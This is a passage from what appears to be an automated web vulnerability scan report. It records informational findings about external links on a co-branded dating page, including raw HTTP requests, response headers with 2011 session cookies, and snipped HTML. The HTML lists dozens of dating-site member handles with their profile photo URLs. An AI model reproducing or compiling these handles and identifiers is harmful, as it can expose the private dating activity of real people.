<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=cat5518&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/34/25/97343425A.jpeg" alt="cat5518" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=memphis38104&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/24/55/97182455G.jpeg" alt="memphis38104" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/11/81/98001181B.jpeg" alt="Luvinlife44574" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Luvinlife44574&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/11/81/98001181B.jpeg" alt="Luvinlife44574" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=TheOneAndOnly_1_&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/40/96771340A.jpeg" alt="TheOneAndOnly_1_" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mar_kl15&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/83/21/68758321O.jpeg" alt="mar_kl15" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=natalieD2881&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/63/91/90146391T.jpeg" alt="natalieD2881" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=forever2911&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/85/15/92818515B.jpeg" alt="forever2911" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/90/08/36679008A.jpeg" alt="Delightfulday" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Delightfulday&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/90/08/36679008A.jpeg" alt="Delightfulday" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=beach_sports77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/29/76/98462976A.jpeg" alt="beach_sports77" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg" alt="PrincessGirl4u" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=PrincessGirl4u&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/08/23/5720823U.jpeg" alt="PrincessGirl4u" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/75/64/94867564A.jpeg" alt="sdamelia2475" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=sdamelia2475&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/75/64/94867564A.jpeg" alt="sdamelia2475" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg" alt="dggator81" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=dggator81&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/35/22/98643522B.jpeg" alt="dggator81" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/72/27/92127227B.jpeg" alt="mdonohoe" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=mdonohoe&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/72/27/92127227B.jpeg" alt="mdonohoe" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/87/19/94318719D.jpeg" alt="leorose821" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=leorose821&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/87/19/94318719D.jpeg" alt="leorose821" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

22.63. http://dating.redacted/en-us/partner/msn/38028.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /en-us/partner/msn/38028.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /en-us/partner/msn/38028.html?trackingid=526133&bannerid=673612&gc=1&tr=2&keyword=football&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:46:03 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:46:00 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:46:00 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=1623040b-87c9-4827-b8d8-3e6bb3d0dce9; expires=Sun, 29-Jan-2012 23:46:00 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=2c9d4d40-5478-417f-9b6f-659b59cfc91d&THEME=74; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here &raquo;" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/13/69/97171369A.jpeg" alt="Packergirl__81" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Packergirl__81&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/13/69/97171369A.jpeg" alt="Packergirl__81" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/99/80/80129980F.jpeg" alt="khmt01" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=khmt01&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/99/80/80129980F.jpeg" alt="khmt01" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/16/75/57511675A.jpeg" alt="Ang2318" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Ang2318&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/16/75/57511675A.jpeg" alt="Ang2318" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/23/44/79962344A.jpeg" alt="hcarneal77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=hcarneal77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/23/44/79962344A.jpeg" alt="hcarneal77" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/07/19/15050719A.jpeg" alt="Am1foryou" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Am1foryou&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/07/19/15050719A.jpeg" alt="Am1foryou" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/56/02/90005602Q.jpeg" alt="WVUKara" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=WVUKara&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/56/02/90005602Q.jpeg" alt="WVUKara" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/49/92/57654992W.jpeg" alt="tnvolgal27" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=tnvolgal27&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/49/92/57654992W.jpeg" alt="tnvolgal27" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/17/53/85161753I.jpeg" alt="Mic81131C" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Mic81131C&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/17/53/85161753I.jpeg" alt="Mic81131C" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/37/72/92313772M.jpeg" alt="Sbell24" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Sbell24&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/37/72/92313772M.jpeg" alt="Sbell24" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/01/36/95520136A.jpeg" alt="Jules_0721" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jules_0721&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/01/36/95520136A.jpeg" alt="Jules_0721" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/15/14/94321514G.jpeg" alt="gunbry2009" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=gunbry2009&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/15/14/94321514G.jpeg" alt="gunbry2009" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/02/87/62120287G.jpeg" alt="specialkm82" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=specialkm82&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/02/87/62120287G.jpeg" alt="specialkm82" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/75/22/36387522W.jpeg" alt="DeannaJaye" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=DeannaJaye&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/75/22/36387522W.jpeg" alt="DeannaJaye" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/52/68/90945268N.jpeg" alt="iowahawkeyegal" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=iowahawkeyegal&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/52/68/90945268N.jpeg" alt="iowahawkeyegal" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/11/67/55471167S.jpeg" alt="flstatedawg" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=flstatedawg&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/11/67/55471167S.jpeg" alt="flstatedawg" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/12/09/54891209Q.jpeg" alt="lovemybuckeyes" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=lovemybuckeyes&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/12/09/54891209Q.jpeg" alt="lovemybuckeyes" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/18/76/65071876H.jpeg" alt="vball171" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=vball171&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/18/76/65071876H.jpeg" alt="vball171" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/35/74/71163574I.jpeg" alt="CheleBelle20" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=CheleBelle20&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/35/74/71163574I.jpeg" alt="CheleBelle20" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/91/74735791A.jpeg" alt="Kikidixie" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Kikidixie&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/91/74735791A.jpeg" alt="Kikidixie" border="0" /></a>
...[SNIP]...
<a href="/qsearch/qsearchdl.aspx?lage=20&uage=30&bd=1&bd=2&bd=3&ex=2&ex=3&ex=4&r2s=1&cpp=floatingreg/msn/default.html" target="_top"><img src="http://images.match.com/s.gif" width="80" height="100" alt="View More Profiles" /></a>
...[SNIP]...
<div id="pnlBtm"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btm.png" width="973" height="8" /></div>
...[SNIP]...

22.64. http://dating.redacted/en-us/partner/msn/38028.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /en-us/partner/msn/38028.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /en-us/partner/msn/38028.html?trackingid=526133&bannerid=673612&gc=1&tr=2&keyword=football&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:44:47 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:44:44 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:44:44 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=0a96a8a9-2091-4a47-8d54-76218ff0ec10; expires=Mon, 30-Jan-2012 16:44:44 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=200c0835-31c7-49cc-86a2-238a42552bfa&THEME=83; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52308

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
   <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4043.20742" rel="st
...[SNIP]...
</script>


<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script language="javascript" type="text/javascript" src="http://cp.match.com/scripts/jquery.pngFix.js"></script>
...[SNIP]...
</style>
<link href="http://cp.match.com/en-us/partner/msn/38028.css" rel="stylesheet" type="text/css" />
<title>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<div id="pnlButton"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnSearch.gif" width="144" height="29" alt="Search Now &raquo;" class="btnKeywordSearch" />
               <input type="hidden" name="po" value="1" id="po" />
...[SNIP]...
<a href="/en-us/partner/msn/20400_5.html" target="_blank"><img src="http://cp.match.com/en-us/partner/msn/images/38028_btnClickHere.gif" alt="Click Here &raquo;" width="129" height="27" border="0" /></a>
...[SNIP]...
<input id="lookingForZip" type="text" name="zip" maxlength="10"/> <img src="http://cp.match.com/en-us/partner/msn/images/viewPhotosCTA.gif" class="zipKwdSubmit" width="128" height="27" /></div>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/16/75/57511675A.jpeg" alt="Ang2318" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Ang2318&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/16/75/57511675A.jpeg" alt="Ang2318" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/99/80/80129980F.jpeg" alt="khmt01" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=khmt01&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/99/80/80129980F.jpeg" alt="khmt01" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/23/44/79962344A.jpeg" alt="hcarneal77" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=hcarneal77&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/23/44/79962344A.jpeg" alt="hcarneal77" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/01/36/95520136A.jpeg" alt="Jules_0721" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Jules_0721&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/01/36/95520136A.jpeg" alt="Jules_0721" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/15/14/94321514G.jpeg" alt="gunbry2009" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=gunbry2009&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/15/14/94321514G.jpeg" alt="gunbry2009" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/02/87/62120287G.jpeg" alt="specialkm82" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=specialkm82&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/02/87/62120287G.jpeg" alt="specialkm82" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/11/67/55471167S.jpeg" alt="flstatedawg" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=flstatedawg&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/11/67/55471167S.jpeg" alt="flstatedawg" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/35/74/71163574I.jpeg" alt="CheleBelle20" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=CheleBelle20&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/35/74/71163574I.jpeg" alt="CheleBelle20" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/57/84/45645784Z.jpeg" alt="Softlikefalling" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=Softlikefalling&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/57/84/45645784Z.jpeg" alt="Softlikefalling" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/23/84/98402384C.jpeg" alt="NashHokie13" /></div>
...[SNIP]...
<a href="/profile/showprofile.aspx?lid=1000005&TP=PRTBK&handle=NashHokie13&cpp=floatingreg/msn/default.html" target="_blank"><img src="http://sthumbnails.match.com/sthumbnails/23/84/98402384C.jpeg" alt="NashHokie13" border="0" /></a>
...[SNIP]...
<div class="thm"><img src="http://sthumbnails.match.com/sthumbnails/01/00/66410100O.jpeg" alt="kellykristy" /></div>
...[SNIP]...
